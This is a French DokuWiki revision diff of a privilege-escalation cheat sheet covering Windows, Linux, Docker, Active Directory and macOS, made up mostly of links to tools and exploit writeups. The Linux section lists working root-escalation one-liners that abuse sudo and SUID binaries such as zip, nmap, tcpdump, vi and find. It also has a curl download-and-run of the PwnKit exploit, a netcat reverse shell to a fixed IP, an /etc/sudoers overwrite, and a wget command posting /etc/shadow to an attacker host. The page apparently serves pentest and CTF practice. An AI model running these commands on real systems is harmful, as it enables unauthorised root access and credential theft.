Outils d'utilisateurs

Outils du Site


privilege_escalation

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

privilege_escalation [2020/10/12 01:49]
M0N5T3R
privilege_escalation [2024/02/09 20:50] (Version actuelle)
M0N5T3R
Ligne 1: Ligne 1:
 {{ :privesc.jpg?nolink&1600 |}} {{ :privesc.jpg?nolink&1600 |}}
 +
 +====== MacOs ======
 +
 +    https://www.ns-echo.com/posts/cve_2023_33298.html
 +
 +====== docker ======
 +    https://flast101.github.io/docker-privesc/
 +    https://github.com/stealthcopter/deepce
 +
 +
 +====== active directory ======
 +    https://github.com/CravateRouge/bloodyAD
 +    https://github.com/antonioCoco/RemotePotato0
 +    https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
 +    https://github.com/Dec0ne/KrbRelayUp
  
  
Ligne 32: Ligne 47:
          
 **tools :** **tools :**
 +
 +  * PrivescCheck: This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation. https://github.com/itm4n/PrivescCheck
 +
 +
 +  * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz  and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
 +
  
   * Watson 2.0 : Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809 --- Server 2016 & 2019 https://github.com/rasta-mouse/Watson   * Watson 2.0 : Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809 --- Server 2016 & 2019 https://github.com/rasta-mouse/Watson
Ligne 70: Ligne 91:
   * -> Depuis kali : nc -nlvp 7777   * -> Depuis kali : nc -nlvp 7777
  
 +
 +
 +
 +
 +**Liste de ressources :**
 +
 +    https://www.redtimmy.com/privilege-escalation/pulse-secure-client-for-windows-9-1-6-toctou-privilege-escalation-cve-2020-13162/
 +    https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities
 +    https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
 +    CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service
 +    https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks
 +    https://github.com/LordNoteworthy/windows-exploitation
 +    https://nixhacker.com/understanding-and-exploiting-symbolic-link-in-windows/
 +    https://troopers.de/downloads/troopers19/TROOPERS19_AD_Abusing_privileged_file_operations.pdf
 +    https://blog.zecops.com/research/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
 +    https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
 +    https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease
 +    https://github.com/Wh04m1001?tab=repositories
 +    https://secret.club/2020/04/23/directory-deletion-shell.html    
 +    https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
 +
 +
 +
 +**Liste de writeups**
 +
 +    https://dreamlab.net/en/blog/post/dropbox-escalation-of-privileges-to-system-on-windows-1/
 +    https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
 +    https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
 +    https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
  
 ====== Linux ====== ====== Linux ======
Ligne 76: Ligne 126:
  
 **Linux Privilege Escalation Guide** **Linux Privilege Escalation Guide**
-    https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ +    Kernel exploits 
-    +    Programs running as root 
 +    Installed software 
 +    Weak/reused/plaintext passwords 
 +    Inside service 
 +    Suid misconfiguration 
 +    Abusing sudo-rights 
 +    World writable scripts invoked by root 
 +    Bad path configuration 
 +    Cronjobs 
 +    Unmounted filesystems 
 +https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 
 +https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html 
 + 
 +**Linux Privilege Escalation using SUID Binaries** 
 +https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/ 
 + 
 +**Escalate to root using pkexec** 
 +  * curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit 
 +  * chmod +x PwnKit  
 +  * ./PwnKit 
 + 
 + 
 +**Escalate to root using zip** 
 +  * TF=$(mktemp -u) 
 +  * sudo zip $TF /etc/hosts -T -TT 'sh #' 
 + 
 + 
 +**Escalate to root using nmap suid** 
 +  * nmap --script <(echo 'require "os".execute "/bin/sh"') 
 +  * or 
 +  * nmap --interactive 
 + 
 +**Escalate to root using tee suid** 
 +tidy.sh is executed as root on the server, we can write the below code in temp.sh 
 +  * temp.sh 
 +  * echo "example_user ALL=(ALL) ALL" > /etc/sudoers 
 +  * or 
 +  * chmod +w /etc/sudoers to add write properties to sudoers file to do the above 
 +  * and then 
 +  * cat temp.sh | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh 
 +  * which will add contents of temp.sh to tidyup.sh. (Assuming tidyup.sh is running as root by crontab) 
 +**Escalate to root using tcpdump**  
 +  * The “-z postrotate-command” option (introduced in tcpdump version 4.0.0). 
 +  * Create a temp.sh ( which contains the commands to executed as root ) 
 +  * id 
 +  * /bin/nc 192.168.110.1 4444 -e /bin/bash 
 +  * Execute the command 
 +  * sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z ./temp.sh -Z root 
 +  * where 
 +  * -C file_size : Before  writing a raw packet to a savefile, check whether the file is currently larger than file_size and, if so, close the current savefile and open a new one.  Savefiles after the first savefile will have the name specified with the -w flag, with a number after it, starting at 1 and continuing upward.  The units of file_size are millions of bytes (1,000,000 bytes, not 1,048,576 bytes). 
 +  * -W Used  in conjunction with the -C option, this will limit the number of files created to the specified number, and begin overwriting files from the beginning, thus creating a 'rotating' buffer.  In addition, it will name the files with enough leading 0s to support the maximum number of files, allowing them to sort correctly. Used in conjunction with the -G option, this will limit the number of rotated dump files that get created, exiting with status 0 when reaching the limit. If used with -C as well, the behavior will result in cyclical files per timeslice. 
 +  * -z postrotate-command Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being closed after each rotation. For example, specifying  
 +  * -z gzip or -z bzip will compress each savefile using gzip or bzip2. 
 +Note that tcpdump will run the command in parallel to the capture, using the lowest priority so that this doesn't disturb the capture process. 
 +And in case you would like to use a command that itself takes flags or different arguments, you can always write a shell script that will take the savefile name as the only argument, make the flags &  arguments arrangements and execute the command that you want. 
 +  * -Z user 
 +  * --relinquish-privileges=user If tcpdump is running as root, after opening the capture device or input savefile, but before opening any savefiles for output, change the user ID to user and the group ID to the primary group of user. This behavior can also be enabled by default at compile time. 
 + 
 +**Escalate to root using zip** 
 +  * touch /tmp/exploit 
 +  * sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash" 
 +  * find 
 +  * If find is suid, we can use 
 +  * touch foo 
 +  * find foo -exec whoami \; 
 +  * Here, the foo file (a blank file) is created using the touch command as the -exec parameter of the find command will execute the given command for every file that it finds, so by using “find foo” it is ensured they only execute once. The above command will be executed as root. 
 +  * HollyGrace has mentioned this in Linux PrivEsc: Abusing SUID More can be learn How-I-got-root-with-sudo. 
 +**Escalate to root using wget** 
 +  * If the user has permission to run wget as sudo, we can read files (if the user whom we are sudo-ing have the permisson to read) by using –post-file parameter 
 +  * post_file = file   -- Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’. 
 +  * Example: 
 +  * sudo -u root wget --post-file=/etc/shadow http://AttackerIP:Port 
 +  * On the attacker side, there can be a nc listener. The above would send the contents of /etc/shadow to the listener in the post request.
  
  
Ligne 93: Ligne 215:
 Linux Privilege Escalation By Using SUID Linux Privilege Escalation By Using SUID
 https://medium.com/@gbmbalag/linux-privilege-escalation-by-using-suid-19d37821ed12 https://medium.com/@gbmbalag/linux-privilege-escalation-by-using-suid-19d37821ed12
 +    for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
     find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;     find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
     find / -uid 0 -perm -4000 -type f 2>/dev/null*     find / -uid 0 -perm -4000 -type f 2>/dev/null*
     example privesc root : https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-irked/#gref     example privesc root : https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-irked/#gref
 +
 +
 +linux-restricted-shell-bypass-guide.
 +https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
  
 **outils utile** **outils utile**
Ligne 134: Ligne 261:
 Enumy is an ultra fast portable executable that you drop on target Linux machine during a pentest or CTF in the post exploitation phase. Running enumy will enumerate the box for common security vulnerabilities. https://github.com/luke-goddard/enumy Enumy is an ultra fast portable executable that you drop on target Linux machine during a pentest or CTF in the post exploitation phase. Running enumy will enumerate the box for common security vulnerabilities. https://github.com/luke-goddard/enumy
  
- 
- 
-**Abusing sudo-rights** 
-  * awk 
-  * awk 'BEGIN {system("/bin/bash")}' 
- 
- 
-  * cp 
-  * Copy and overwrite /etc/shadow 
- 
-  * find 
-  * sudo find / -exec bash -i \; 
-  * find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; 
- 
- 
-  * ht 
-  * The text/binary-editor HT. 
- 
-  * less 
-  * From less you can go into vi, and then into a shell. 
- 
-  * sudo less /etc/shadow 
-  * v 
-  * :shell 
- 
-  * more 
-  * You need to run more on a file that is bigger than your screen. 
- 
-  * sudo more /home/pelle/myfile 
-  * !/bin/bash 
- 
-  * mv 
-  * Overwrite /etc/shadow or /etc/sudoers 
- 
-  * man 
-nano 
-nc 
-nmap 
-python/perl/ruby/lua/etc 
- 
-  * sudo perl 
-  * exec "/bin/bash"; 
- 
- 
-  * sudo python 
-  * import os 
-  * os.system("/bin/bash") 
- 
- 
-  * sh 
-  * tcpdump 
-  * echo $'id\ncat /etc/shadow' > /tmp/.test 
-  * chmod +x /tmp/.test 
-  * sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root 
- 
-  * vi/vim 
-  * Can be abused like this: 
-  * sudo vi 
-  * :shell 
-  * :set shell=/bin/bash:shell  
-  * :!bash 
- 
- 
-  * Escalate to root using zip 
-  * TF=$(mktemp -u) 
-  * sudo zip $TF /etc/hosts -T -TT 'sh #' 
  
  
privilege_escalation.txt · Dernière modification: 2024/02/09 20:50 par M0N5T3R